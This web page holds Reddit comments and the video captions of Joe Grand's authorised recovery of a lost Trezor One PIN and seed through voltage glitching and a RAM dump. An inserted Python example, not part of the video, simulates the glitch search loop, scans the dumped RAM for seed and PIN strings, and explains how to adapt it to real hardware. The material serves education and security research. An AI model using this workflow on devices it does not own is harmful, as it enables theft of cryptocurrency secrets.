How I hacked a hardware crypto wallet and recovered $2 million

Reddit Comments

I read an article on this yesterday. Not certain if it's the same thing as this video, just in case I'm conflating them. It was one of the best-written articles I've read, as it contained very easy to understand technical info on how it was done.

It has to do with creating an error fault while booting that allowed reading the password in ram.

Doesn't give me much hope that my trezor is truly unhackable.

https://www.theverge.com/2022/1/24/22898712/crypto-hardware-wallet-hacking-lost-bitcoin-ethereum-nft

πŸ‘οΈŽ︎ 135 πŸ‘€οΈŽ︎ u/slo1111 πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Should be noted that the reason this worked is that it was on old firmware, and the specific hack he used wouldn't work now, as the line in the source code that made it possible was removed in the next firmware update, so he (the guy who owned the device) was super lucky in that regard.

It's an interesting video for sure; I'd recommend giving it a watch.

πŸ‘οΈŽ︎ 36 πŸ‘€οΈŽ︎ u/Suhmedoh πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

29 minutes of fluff with 3 minutes of actual hacking content.

πŸ‘οΈŽ︎ 93 πŸ‘€οΈŽ︎ u/vbisbest πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

It made me giggle that he burned incense to clear the air prior to the hack.

πŸ‘οΈŽ︎ 30 πŸ‘€οΈŽ︎ u/MokausiLietuviu πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Wow, congrats. Where did you get this hardware crypto wallet from?

Edit: Did not see it was a video. Watch it! So far it is very interesting. Apparently someone asked to hack into it for him, since the password was lost.

πŸ‘οΈŽ︎ 18 πŸ‘€οΈŽ︎ u/junglebodygullefues πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Good find, thanks for sharing this.

πŸ‘οΈŽ︎ 4 πŸ‘€οΈŽ︎ u/pr0v0cat3ur πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Ahh, it's Kingpin from the L0pht. Long time no see, lol.

πŸ‘οΈŽ︎ 3 πŸ‘€οΈŽ︎ u/ozillator πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

Great Video!

πŸ‘οΈŽ︎ 4 πŸ‘€οΈŽ︎ u/Talonzor πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies

It's amazing! I wonder what wallets hackers generally choose to use, how about Coinhub?

πŸ‘οΈŽ︎ 2 πŸ‘€οΈŽ︎ u/Murky-Teaching-6240 πŸ“…οΈŽ︎ Jan 26 2022 πŸ—«︎ replies
Captions
What if you had a couple million dollars stored on a piece of silicon the size of a postage stamp, and it was protected by a password that you forgot? Chips like this are in all sorts of different types of hardware wallets out there that are supposed to be used to protect your recovery seeds and your private information in the world of cryptocurrency. But a lot of people forget their passwords, and if you forget your password, if you can't access the information on the chip, you're out of luck. You're out of money. That's the problem we're dealing with today.

Some guys contacted me out of the blue. They have a Trezor hardware wallet, and they have a couple million dollars stored on a device like this, and they want me to see if I can hack the wallet, defeat the security, and get access to the information so they can prove that the money is theirs.

I'm Joe Grand. I'm a hardware hacker, computer engineer. Hacking a product like this is an amazing challenge. It's like solving a puzzle, and we really only have one chance to do it right.

"Joe, what's happening?" "Um, sorry, let me... I've got to take the electrical tape off my camera. Um, how's it going?" "Good, man. Good to connect and talk shop and hopefully make some progress on this stuff. Are you excited?" "Yeah, you know, in my mind, honestly, I've told myself that whatever happens, one way or the other, it's gonna be a great story. It's just gonna be a question of if it's gonna be a really expensive story or not. But either way, it's gonna be one for the memory foam." "Yeah."

Hacking is nothing like what you see in the movies. There's not graphical things moving all over the place. It doesn't take a split second for something to happen. It's a huge rollercoaster ride. It's solving puzzles. It's forcing computers and forcing hardware to do things that they weren't expecting to do. You want them to misbehave in a way that you can control.

"Contract looks good. I think the changes we wanted are now accounted for. For me, as you know, the main thing was just like getting that waiver of liability, so you're not going to sue me if something goes wrong."

For this project I've been working 12 weeks to try to defeat the security in a way that's reliable and that isn't, hopefully, going to erase the contents of the device. Now that we're here and we're filming it and Dan is on his way and we're gonna do the real thing, there's a lot that can go wrong.

"You have the device? You got it from Jesse?" "Yeah. The main thing that I'm kind of worried about is bringing it through the X-ray, um, and maintaining control of it for the X-ray." "Like, you know, most electronics is going to be X-ray safe. It's not like they're using super powerful X-ray. What I've done a lot of times is like ask for a manual inspection." "Yeah, this thing isn't leaving my side."

What I'm doing with this attack is kind of like disabling an alarm system in a museum and stealing the jewels. Except actually it's like somebody made an exact copy of the jewels, put them behind a locked door, and then I went and kicked in the door and stole the jewels, but then the original jewels are still there. It's a little bit crazy.

"That's sweet. So I fly out, 8:15 flight tomorrow." "Don't drop the token." "Honestly, I'm more afraid of losing... dropping or misplacing the token, and then the thing getting fried in security. I'm gonna duct tape it, probably." "Well, don't duct tape it." "Because I was literally going to duct tape it." "Any sort of tape will generate static electricity, which we don't want to do."

One of the most important things to me, being a hacker, is to discover some superpower and then educate other people about it, inspire other people about it, and help people using my skills. When I was a kid, that was not the case. I got arrested for all sorts of computer-related things, and it was doing a lot of what I call technological juvenile delinquency. But now that I know that I can use my superpowers for good and help people, that's the beauty of hacking.

"I'm informed that within 30 minutes the seven of you could make the internet unusable for the entire nation. Is that correct?" "That's correct." "Good morning. My name is Kingpin. I am the youngest member of the L0pht and one of the electrical engineers and hardware hackers."

There's no malicious intent, there's no criminal intent. It's to help these guys who have lost their password get their money.

"I'll see you tomorrow. Have a great flight. Be safe. Protect that treasure." "Will do."

Before we go forward, let's go back to the basics. Cryptocurrency is a decentralized system of digital currency. Unlike traditional financial systems, where trust of the currency is based on banks and governments, with cryptocurrency the trust is based on the strength of the cryptography that it uses. The type of cryptography that's used in cryptocurrency systems varies depending on the cryptocurrency, but generally it falls into public key cryptography. You have two pieces of your key. The private key is something you keep to yourself, and you use that to sign the transaction to prove that you initiated it. The public key, which is derived from the private key, is used to verify the transaction. The blockchain is a type of technology that's used with cryptocurrency as basically a decentralized digital ledger, so every time there's a transaction that happens, it's public and the ledger cannot be changed. In the case of Dan and Jesse, they lost their private key, because that's something that's stored on their physical hardware wallet. A hardware wallet is essentially a general purpose computer that's storing your private key. But if you forget your password to your hardware wallet, you're kind of screwed, unless you find somebody like me.

Good morning. Today is the day I'm gonna hack this wallet, and we get to see if the three months of work was worth it. So it's about 5:30 in the morning and I'm just waiting for my taxi to pick me up. "Are you into crypto coins at all?" "Oh no, I'm so afraid of all that." Kind of just pacing around my office. Even though I know it's possible, it's still scary.

A few years ago, a friend of mine and I were investing in buying some cryptocurrency. Not Bitcoin, one of these other unique coins that we wanted to buy. So we put a little bit of money into it.

It's funny, my wife actually came in today and she said, "Joe, have you read your horoscope?" And I'm like, no, I don't really read my horoscope. For some reason she read the horoscope, and it said something for Virgos: beware of problems with technology.

You had to put it on one of these hard wallets that kind of looked like a USB stick. Time went on, the price of these coins went up and up and up.

In other news, I just sliced my hand taking out the trash. It's not my soldering hand, which is good.

I hit him up and said, time to free the coins, sell them and give me my money back. Turns out he forgot the password, so he couldn't send me my money back.

You have all of my Trezor devices over here that I've been using for the various attacks. The one that's set up like this is what's going to be used for Dan's attack.

The irony of it all is my friend that lost the password plays poker professionally for a living, so he has like photographic memory. He remembers everything. He remembers my license plate from high school, and of all things, forgot a four-digit PIN password for this device.

Let's clear the air for today.

So, long story short, I'm going to fly to Portland, Oregon, because I met some engineer hacker online. "All right, let's go to the security." Who's going to hack this device and try to free all these coins.

So Dan is on his way from New Jersey, and I hope he didn't put the Trezor through the X-ray. "I just made it through airport security. The device did have to go through the X-ray machine, which is no big deal, because computers can and all the other devices can." So Dan is on the way with the wallet. Dan's coming, and he's driving down the street backwards. Did he drive this way all the way from the airport? "How's it going?" "Nice meeting you." "I know, great, you exist." "You got the thing? You got the thing?" "Awesome." "I heard you had to put it through the X-ray machine." "I did put it there." "Right, right." "No, I'm good, thanks." "Yeah, what are you guys filming?" "Um, we are... you want to tell them?" "We're hacking a hardware wallet that has a lot of cryptocurrency on it. He forgot his password." "Well, I didn't forget the password." Okay, let's begin.

So to add insult to injury on this whole thing with the Trezor hard wallet, if you attempt the password incorrectly too many times, the contents of the wallet will erase. And so we scoured the earth and Google to try to find people that could help. It turns out our most promising leads came down to Joe, this hacker we found on Google, and then these other guys in Europe. They are based in Switzerland at some secret lab where they would perform the attack. When I asked them if I can come to the lab to see what they were doing and ensure that this was legitimate and real, they said that they couldn't do that. I was willing enough for them to even like put a bag over my head and bring me to this lab, just so I can see that they were not going to steal the device and actually do the work. And right around that time, Joe started to make progress and for the first time show that he was able to crack the device. And all the while, Joe was incredibly transparent with how he was performing the work. Very quickly it was clear he was engaged. That's why I got on a plane this morning and came to Portland to hopefully free the coins.

I tell people I'm a technology minimalist, or like a technological curmudgeon, because I know too much. There's a lot of stories of people forgetting their passwords of hardware wallets and losing a whole lot of money. This one was actually from 2017. A friend of mine, Mark Frauenfelder, had 7.4 bitcoins that were worth $3,000, and he had written his recovery seed on a piece of paper, and the cleaning person came, threw that out, and he's like, that's okay, I still remember my PIN. But it turns out he also forgot his PIN. Once he found somebody who could hack it, it was worth $32,000. And it just shows that this was four years ago, when cryptocurrency was in its infancy. This was still happening. Here's another one. This one: "Man makes last ditch effort to recover $280 million in bitcoin he accidentally threw out." So this guy had 7,500 bitcoins. His private key was on a hard drive. He had two hard drives that looked identical, and it turns out he threw the wrong one out. He realized after a couple months that the drive was missing. The interesting thing is that the hard drive is in the local garbage dump. It's a needle in a really disgusting haystack. "Man has two guesses to unlock bitcoin worth $240 million." This is not uncommon, and these are just the major stories. And he wrote his password down on a piece of paper that he has lost. Crazy. I would almost guarantee with extreme certainty that we could hack something like that, especially for that amount of money. We'll figure it out.

For the Trezor One device that I'm hacking on, there have been exploits developed over time to break security of the device. So when Dan contacted me and said, hey, can you break the Trezor, I was like, sure. I thought I'd be able to replicate some of the work that was out there. What ended up happening is a long tale of three months of effort, of trial and error and trying different techniques, until I got it right. I knew that the attack would need to take advantage of something called fault injection, where we're basically causing misbehavior on the silicon chip inside of the device in order to defeat security. And what ended up happening is I was sitting here watching the computer screen and saw that I was able to defeat the security. The private information, the recovery seed and the PIN that I was going after, popped up on the screen. I kind of didn't think it was right, because that's not what I was trying to do, and ended up mentioning it to my wife later on. She's like, well, so you did it. And I'm like, I guess.

"When he couldn't recreate it, I'm like, all right, and I walked into his office and I said, okay, tell me what you did, take me through the process." "But I don't know what I did. Like, I don't know how that happened." "And we were in there for an hour or so, kind of going through it all. Recreate your steps, retrace everything you did that day. I said, did you write it down? Did you write down everything you did? And he showed me, and he literally wrote everything he did. Then you said, but then I did this and I did this, and I talked to this person at the same time."

So I looked through my command line history of what I was doing on my computer and started at the beginning of the day. Would start a Zoom call, would run the commands that I had run on my computer, completely separate from the actual attack. Was I plugging something in to my computer that was causing some glitch on the Trezor that happened to be connected? I just could not replicate what I did.

"So he was really defeated, and he can do anything." So in my mind... my wife kept saying, you know, computers do what they're told, which generally is true, unless you force it to do something unintentional, which is kind of what we're doing. I slept on it, woke up, came downstairs, looked through the source code of the Trezor device, because I figured at some point in that process that recovery seed and that PIN had to be moved into that RAM area that I was able to access through my debug interface. This is exactly why I can perform my attack: this memcpy function right here. I checked future versions of firmware. This was 1.6.0. In 1.6.1, the next small revision, that function had been removed and the whole memory structure actually had been changed. It turns out that I found an area in the source code where on power up the secret information gets copied into RAM, and then when I do my glitch to defeat the security of the chip to give me access to RAM, the contents are there and I could get them out. "I felt really good to help with something that I know nothing about."

So yeah, let me give you a rundown of like the whole setup, just so you can kind of get a feel for the process and what we're seeing. In order for this attack to work, we have to use a bunch of different hardware. There's a security feature inside of the microcontroller inside of the Trezor that prevents us from reading the memory contents. So what we need to do is figure out a way to defeat that security so we can read the memory. The security mechanism only happens on power up of the Trezor device, which means when we're doing our attack, trying to defeat that check, we need a way to power cycle the Trezor over and over and over again. In order to power cycle the Trezor, I'm using a device called the PhyWhisperer. We're just using it to power the device on and off. This glitch only works if we glitch the chip on power up, so it's something where we have to turn the device on, try to glitch it, if it doesn't work, turn the device off, turn it on. Once power to the Trezor is applied, we want to try to defeat the security check at exactly the right time to trick the chip into thinking that we have access to it when in reality we shouldn't. To do that, we use a tool called the ChipWhisperer, and we're using an attack called a fault injection, or a voltage glitch. That basically means that we're trying to force the chip into misbehaving in some way that's beneficial to us. We're basically taking advantage of the fact that electronic systems are defined to operate within specific parameters, and the vendor can only guarantee functionality within that area. My question is, what happens when we operate the device outside of that? And that's what we're doing with glitching. If we can glitch the chip at just the right time, we're going to defeat the security, and then we can continue with our attack.

"I feel like I'm back in school." "Yeah, I mean, it's like school, except the tools are way more powerful now and the stakes are a little bit high... a little bit higher." "Yeah."

The way that we know that we've properly defeated security is that the chip will enable what's called a debug mode. And a debug mode uses an external piece of hardware like this to let a legitimate engineer normally read memory and do general debugging of a microcontroller. In the case of the Trezor, if we defeat the security feature, it will enable debug mode and only let us access one particular area of memory, which is the RAM. The recovery seed and the PIN, that private information that we need, is copied into RAM. We also need to modify the Trezor device to allow us to connect it up to the rest of our hardware. That's going to look something like this. All of the hardware pieces are tied together with this custom circuit board, and if everything works properly, then we win.

When Miles, my nine-year-old, came in here when I started doing this, I'm like, it's kind of like when you're glitching a video game. Yeah, you know, and like you find some bug and you can skip the level or do whatever. He's like, oh, so you just have to get the timing right to do the glitch. And I'm like, yes.

"Um, okay, should we do it?" "You can tell I'm nervous. You're like cool and collected, and I'm sitting here like tapping my feet." "Well, I have... it's out of my hands at this point." "You want to do it? Do the handoff?" "Yeah, yeah, let's do it." "Okay." "All right." "Okay, wow, there it is." "All righty, thank you. So now that I have it, you're not allowed to touch it, right?" "Great, I don't want to touch it." "Okay, so in your hands, this is it. Millions of dollars on this exact Trezor wallet, and we're gonna hack it." "Let's do it." "Yeah. Okay, so when was the last time you plugged this in? That was recently, right?" "So yeah, a couple weeks ago." "Yeah, okay, all right, so we know it worked then. So what I'm going to do is I'm going to plug it in to my computer, make sure that it actually confirms the firmware. So it seems to function so far. So now my computer is going to communicate with this device. See what happens. Okay, firmware is out of date. That's good. So this is 1.6. Everything is set. Sweet. Now we can go and crack it open and start."

The one risk that we face here is breaking something as we're opening the case. So I'm doing really light cuts here. I can feel it, part of it's getting through. No damage on that side. Ta-da. It has the conformal coating on it, which is the protective layer to protect the components. That makes it a little bit harder for us to solder to the connections. So my next step is to apply some chemicals to get rid of that coating and then start soldering wires. Okay, I just like to get it as clean as possible. Stickers off. I'm going to use a conformal coating remover pen, and really we just need it over the connector that we're going to solder to and over the components that we're going to remove. Otherwise, if we try to solder to those connections, they might not make a good connection. So now that hard epoxy just kind of peels right out. I think that's good. I'm gonna check it on the magnifying glass just to be sure it's actually removed. Okay, we're good to go.

The next step is we have to remove a couple components from this board. The components we're removing are capacitors, and by removing them, it makes the chip more susceptible to those little glitches and stuff that we're doing. What I'm going to do is use my soldering iron and just very carefully heat both sides of the part and pull it off the board. The risk at this stage is pulling off some of the circuit board with it, which hopefully won't happen. Iron is on. Yeah, there's two that we need to remove. One is easier to get to than the other. Okay, first one's off. Got it. All right, so those components are off. Now all I have to do is add the external connectors that's going to let us hook it up to the hardware over there. Okay. It is prepped and ready. Let the glitching begin. "How you feeling now?" "Uh, that's crazy stuff."

I'm gonna plug in our different hardware. Plug that into this connector. There's an eyelash on the table. Now let's get our scope on. Let's look this guy up. And so when I start this, it's going to start our full glitch attack, and it's going to go step by step trying the different glitch offsets until it hits. Let's just run the loop. So this is the main loop. It's going to power cycle, check, over and over again, if the debug interface is opened. As soon as it works, we get that device ID, then we know it's wide open for us. I'm gonna start it. Ready? "I'm ready." Here we go. So now we wait. "This is it. It's the police stakeout." "Yeah, we sit here and eat donuts, and then a couple hours later something good happens." "Should we take bets on how long it's gonna take?" "I'll say it's gonna go within an hour." "Good, one hour. I'm gonna say it's gonna be between three and four hours, okay, or it doesn't go within four hours, and that's a possibility too. I mean, it could take longer, it could take six hours, could take more, because we're only testing one a second, and we're going through a pretty wide range of about 10,000 attempts. But it might need to go through another loop before it hits it, so we don't really know. Hopefully we don't have to stay overnight, but we're just gonna let it run until it happens."

So what was happening is I was sitting here for hours at a time just looking, making sure the lights were blinking, and it got to the point where I was like, I just want to like use my computer for other stuff. So I made a little audible thing in here. It's going to say a little phrase when it comes up, which is actually really strange, because you're just sitting here and then it says it and you're like, oh, it worked.

"I'm gonna go for a pepperoni." "Sweet." "Vegan." "I... pepperoni."

It's blinking. I see the J-Link blinking. That makes me feel good. What's actually interesting is there's sort of these like repeatable spikes here, which I don't remember seeing before. It's like one kilohertz. That's really interesting. So these spikes, I'm guessing, are gonna be from the lights. So if that's the case, we might want to change some of the lighting. "Oh, you think the lighting, for the light and the frequency, might be causing some issue?" "I mean, it still might work, but I'm curious, because this doesn't match what I saw. So if you turn off the lights, I think the spikes go away." "Yeah, so that's got to be something that wasn't here." "Yeah, when I was doing the testing before." "Can we kill... let's kill the lights, let's see what happens." "Let me try this one." "Still there." "Yeah." "Um, okay, I think it's this one." "Still there." "Still there." "How about this one?" "Still there." "Wireless mic?" "Yeah." "Let's... I mean, it could still glitch fine. We have no idea, but that just makes me a little nervous." "Um, I would disconnect this guy." "None of this should matter, because it was all plugged in before, but to be safe." "Still there." "No, let me turn off the robot lights." "Okay, hold that there. I'm gonna power everything back on." "Yeah, it's still there. It's that same repeating with that glitching." "Well, I have a ground here that's shared, but I'm thinking like..." "Don't tell anyone." Don't forget your ground clip, kids. That's like engineering 101. It's almost always a stupid problem too. And what's interesting is we were seeing the spikes because the ground wasn't connected, but the chip was still seeing the right thing all the time. But now it's set. Our signal looks way better. This thing looks like it's happily glitching, and now we want to... now we wait. "Yeah."

"Oh, pizza's here." "Nice. The fuel of hackers." "It's good." "Good. It's got a little kick to it." If I start acting erratically and lunging at the circuitry, throw me to the ground. There's like nothing to do. There's literally nothing to do. Come on. This is torture. "OMG, like they say on the internet." Okay, so that was three hours and 19 minutes, which is right within that sweet spot. "Oh my god." But now the question is, is that too far in the boot process? Did we miss an earlier glitch that's going to keep the contents in memory? So why don't we find out. "I'm already shaking." "All right, I'm too excited." "This is the literal money shot." "Yeah, right, like this is the money shot." Okay, so we glitched it. Now I'm going to run the external program to extract the RAM. Okay, we've successfully copied the RAM out of the device. Now we can run strings and look at that file which has been sucked off of this device. So we're done with this hardware. If the contents are in the RAM, we have it on my computer right now. "I'm so nervous right now, you don't even understand. I don't know if you can see, like, sweaty palms." "Sweaty palms." "All right. Okay, ready? Three, two, one." "One two five one four. We did it." "That's how you hack a wallet." "All that pain and suffering." "Oh, that actually reminds me, um, can you pay me now?" "Yeah, that's awesome. My god. It was like that pause between clicking that command and seeing it come up is like, oh, I'm gonna get that." "Oh yeah, three, Theta, look at that." So that's it, one two five one four, and he thought it was one two one five or something like that. "You got four out of the five." "That's windows."

"I have something to tell you." "I know, you texted me." "How do you know it worked?" "Is that awesome?" "Yay, thanks for the support. Family effort." "How did you feel?" "Happy." "Why?" "It's because you finished it. It's cool that my dad's a hacker." "Thanks, that was cool." "I was sort of skeptical about it, especially when he told me how much money there was on that. I was like, that's really risky. Well, I knew he was going to do it, so I wasn't as excited and shocked as I thought I'd be. I mean, I was happy, very happy for him and everybody, but it wasn't a surprise. This is what he needed. I've been telling him for years that he needed something other than teaching. He needed to do something else. And I always say, like, you have this skill set, so why are you not using it to the fullest potential? So this helped him realize his strengths and his gifts." "Been a pleasure." "Yeah."

"That was emotionally draining. About a year, probably a little bit less, we thought, at least I thought, that we were never going to see this money again. The coins were gone forever. Now we just went on this emotional rollercoaster. It's come to an end, man. That was crazy."

This project was a perfect example of what hardware hacking is all about: the trials and the errors and the failures and the successes, and having it all culminate in this final attack, where we could extract the recovery seed from a protected microcontroller. One thing that Trezor does really well is they keep track of all of the security vulnerabilities that people have found and reported to them. We don't see that a lot in the hardware space. The fact that Trezor has a website where they publish all of that information, acknowledge their problems and fix them, is something that really should be applauded. What we did with this hardware wallet is only just the beginning. There are so many people out there with challenges, whether other people have forgotten their passwords that we need to pull off of devices, or they have other pieces of technology that they need to extract some piece of information from. If you have some crazy story needing help with technology, with cryptocurrency, getting your passwords off, feel free to reach out. I'm always looking for new puzzles and new challenges, and I'm ready to take it on.
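The two software halves of the attack described in the captions, as an added example that is not Joe Grand's code and not from the video: the main loop that power-cycles the chip, fires one voltage glitch at a candidate offset after power-on and checks whether the debug port now answers with a device ID, and the post-processing that runs a `strings`-style scan over the dumped RAM and filters for something that looks like a recovery seed and a PIN. Everything hardware-related is replaced by a simulated target (a pure-Python stand-in whose boot-time protection check is corrupted only when the glitch lands in a narrow window, and then only with some probability, which is why the sweep may need a second pass), so it runs with no ChipWhisperer, PhyWhisperer or J-Link attached. The glitch window, the Cortex-M3 SW-DP IDCODE used as the "port is open" marker, the 1 to 9 digit PIN length, the `char mnemonic[241]` / `char pin[10]` layout of the constructed RAM image and the filler bytes around it are all assumptions of the example; the mnemonic is the public BIP39 test vector, not anyone's wallet, and a real run would also check every word against the 2048-word BIP39 list.

```python
"""Glitch search loop plus RAM-dump triage, against a SIMULATED target.
Added example only; nothing here talks to real hardware."""
import random
import re

# ASSUMPTION: value the simulated debug port returns once it is unlocked.
# 0x2BA01477 is the Cortex-M3 SW-DP IDCODE; it is used here as a marker only.
SIM_IDCODE = 0x2BA01477


class SimulatedTarget:
    """Stand-in for the wallet MCU. The real part decides at power-up whether
    the debug port stays locked; here that decision is corrupted only when
    the glitch lands inside `window` (cycles after power-on), and even then
    only with probability `success_prob`, as on real silicon."""

    def __init__(self, ram, window=(7_210, 7_230), success_prob=0.5, seed=1):
        self.ram = ram
        self.window = window              # ASSUMPTION: simulated glitch window
        self.success_prob = success_prob
        self.rng = random.Random(seed)
        self.debug_open = False

    def power_cycle(self):
        self.debug_open = False           # the protection check re-runs on every boot

    def glitch(self, offset_cycles, width_cycles):
        lo, hi = self.window
        if lo <= offset_cycles <= hi and width_cycles >= 4:
            self.debug_open = self.rng.random() < self.success_prob

    def read_idcode(self):
        return SIM_IDCODE if self.debug_open else None

    def dump_ram(self):
        if not self.debug_open:
            raise PermissionError("debug port locked")
        return self.ram


def glitch_search(target, offsets, width_cycles, max_passes=3):
    """Sweep glitch offsets; return (offset, attempts) on the first success,
    or None. One sweep may miss, hence the outer loop over passes."""
    attempts = 0
    for _ in range(max_passes):
        for offset in offsets:
            attempts += 1
            target.power_cycle()
            target.glitch(offset, width_cycles)
            if target.read_idcode() is not None:
                return offset, attempts
    return None


PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")              # what `strings` prints (min 4)
SEED_RE = re.compile(r"^(?:[a-z]{3,8} ){11,23}[a-z]{3,8}$")   # 12..24 lowercase words
PIN_RE = re.compile(r"^[0-9]{1,9}$")                          # ASSUMPTION: 1..9 digit PIN


def strings(dump):
    """Printable ASCII runs of at least 4 bytes, like `strings` with no -n."""
    return [m.group().decode("ascii") for m in PRINTABLE_RUN.finditer(dump)]


def find_secrets(dump):
    """Triage the printable runs: {'seed': [...], 'pin': [...]}.
    PINs shorter than 4 digits would need a lower minimum run length."""
    found = {"seed": [], "pin": []}
    for s in strings(dump):
        if SEED_RE.match(s):
            found["seed"].append(s)
        elif PIN_RE.match(s):
            found["pin"].append(s)
    return found


def build_demo_ram():
    """Constructed RAM image: random filler around NUL-terminated char arrays,
    roughly how a plain C storage struct would lay out. ASSUMPTION throughout."""
    filler = random.Random(7)
    noise = lambda n: bytes(filler.randrange(256) for _ in range(n))
    mnemonic = " ".join(["abandon"] * 11 + ["about"]).encode()  # public BIP39 test vector
    pin = b"4321"                                               # constructed, not real
    return (noise(300) + b"\x00"
            + mnemonic.ljust(241, b"\x00")   # char mnemonic[241]
            + pin.ljust(10, b"\x00")         # char pin[10]
            + noise(300))


def run_demo():
    """Glitch until the port opens, dump RAM, triage it. None if the sweep fails."""
    target = SimulatedTarget(build_demo_ram())
    hit = glitch_search(target, range(7_000, 7_500), width_cycles=6)
    if hit is None:
        return None
    offset, attempts = hit
    return {"offset": offset, "attempts": attempts, **find_secrets(target.dump_ram())}


if __name__ == "__main__":
    print(run_demo())
```

The loop structure is the part that carries over to real hardware: replace `power_cycle`, `glitch` and `read_idcode` with the calls that drive the power switch, the glitch module and the debug probe, keep the sweep over offsets and the outer retry, and keep the success test as "the debug port answers", not "the glitch fired". The triage half is deliberately dumb; the point is that once RAM is readable the secrets are plain ASCII and fall out of `strings`.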
Info
Channel: Joe Grand
Views: 4,645,674
Keywords: joe grand, electronics, hacker, Trezor, Ledger, Crypto, Cryptocurrency, Fault Injection, Voltage Glitching, Glitching, ChipWhisperer, Bitcoin, BTC, ETH, Ethereum, Theta, hacking, hardware, wallet
Id: dT9y-KQbqi4
Length: 32min 17sec (1937 seconds)
Published: Mon Jan 24 2022